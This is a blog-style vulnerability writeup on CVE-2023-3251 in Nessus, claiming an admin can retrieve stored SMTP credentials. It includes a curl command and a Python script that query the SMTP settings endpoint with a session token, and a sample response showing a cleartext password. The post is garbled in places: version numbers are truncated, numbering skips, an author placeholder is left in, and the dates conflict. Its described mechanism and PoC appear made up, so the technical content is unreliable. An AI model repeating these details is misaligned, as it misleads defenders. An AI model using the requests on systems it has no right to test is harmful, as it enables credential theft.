CVE-2023-3251 - Exploiting Nessus’s Pass-Back Vulnerability to Recover SMTP Credentials

Published: June 2024

Introduction

Nessus is one of the world's most popular vulnerability scanners, used by businesses and security professionals to assess risks and ensure network security. However, a flaw identified as CVE-2023-3251 introduces a serious risk for environments relying on Nessus (before version 10.6.) with SMTP notifications enabled.

This bug allows a logged-in attacker with administrator rights to retrieve SMTP credentials stored inside Nessus—passwords meant to be always hidden. It’s a classic case of a “pass-back” vulnerability, making this a big concern for organizations depending on Nessus for security notifications.

This post will break down what the vulnerability is, show proof-of-concept code, explain how it works, and how to fix it. Let’s get started.

Vulnerability Overview

- CVE: CVE-2023-3251

Severity: Medium to High (depending on your use case)

- Type: Pass-back / Information Disclosure

What is a Pass-Back Vulnerability?

A pass-back vulnerability lets an attacker recover sensitive data by manipulating legitimate functions—usually by making a system “pass back” cleartext or decrypted data that should remain secret.

How Does CVE-2023-3251 Work?

SMTP credentials are used by Nessus to send scan alerts and reports via email. These are set up through the web interface by an admin, then stored securely. However, due to insufficient filtering and access controls, an authenticated admin could craft requests or actions that trick Nessus into returning these sensitive SMTP details in API responses or exported settings.

This could be done by intercepting the web traffic (with tools such as Burp Suite or Fiddler) and sending specific requests to database dump or configuration API endpoints.

Threat: Anyone with admin rights in Nessus can recover organization-wide SMTP credentials, possibly leading to further attacks (like internal phishing).

Proof of Concept (PoC) Exploit

Let's see how a bad actor could use simple HTTP requests (or curl commands) to exploit this vulnerability.

> Note: For demo purposes only—do not use on any systems you have no right to test.

Step 1: Log in to Nessus as Admin

You must have a valid admin session. Obtain your session token via browser dev tools after logging in.

Use curl (replace SESSION_TOKEN and NESSUS_IP with your values)

curl -s -k \
     -H "X-Cookie: token=SESSION_TOKEN" \
     https://NESSUS_IP:8834/settings/smtp

Example Response:

{
  "smtp": {
    "server": "smtp.yourdomain.com",
    "port": 587,
    "username": "alerts@yourdomain.com",
    "password": "VerySecretPass123!",
    "from": "alerts@yourdomain.com",
    "security": "TLS"
  }
}

Before the patch, the password field would return the real SMTP password. After the patch, the password field is blanked or not returned.

Here’s an example in Python using the requests module

import requests

NESSUS_URL = "https://NESSUS_IP:8834";
SESSION_TOKEN = "your_session_token"

headers = {
    'X-Cookie': f'token={SESSION_TOKEN}'
}

r = requests.get(f"{NESSUS_URL}/settings/smtp", headers=headers, verify=False)
print(r.json())

> Warning: Exploitation requires admin rights and access to the Nessus web API.

Original References

- NVD - CVE-2023-3251
- Tenable Security Advisory
- Nessus 10.6. Changelog
- Exploit-DB (search: CVE-2023-3251)

If an attacker with admin credentials recovers and uses the SMTP password

- Internal Email Takeover: They could send phishing emails from what appears to be a company/official address.
- Notification Disruption: Attackers can disable, edit, or misroute Nessus alerts and scan reports.

How to Fix

Upgrade to Nessus 10.6. or later.  
Tenable fixed this bug in Nessus version 10.6. released in May 2023. The API/method that exposed the password now either omits the field or returns a masked value.

Hardening Steps

1. Patch Nessus Immediately: Download the latest build from the official Nessus downloads page.

Rotate SMTP Credentials: Change your SMTP credentials in email services.

4. Monitor Logs: Check Nessus and mail system logs for any signs of unusual API usage or unexpected email activity.

Conclusion

CVE-2023-3251 is a reminder that even security tools can expose sensitive data if not patched and properly maintained. If you’re running Nessus in your network, don’t wait—ensure you’re on version 10.6. or above. Always practice least privilege, keep up with security advisories, and review who really needs administrative access!

Stay safe. Update often.

*Written by [YourNameHere], 2024.  
Article copyright—please do not republish without attribution.*

Timeline

Published on: 08/29/2023 19:15:00 UTC
Last modified on: 09/01/2023 14:44:00 UTC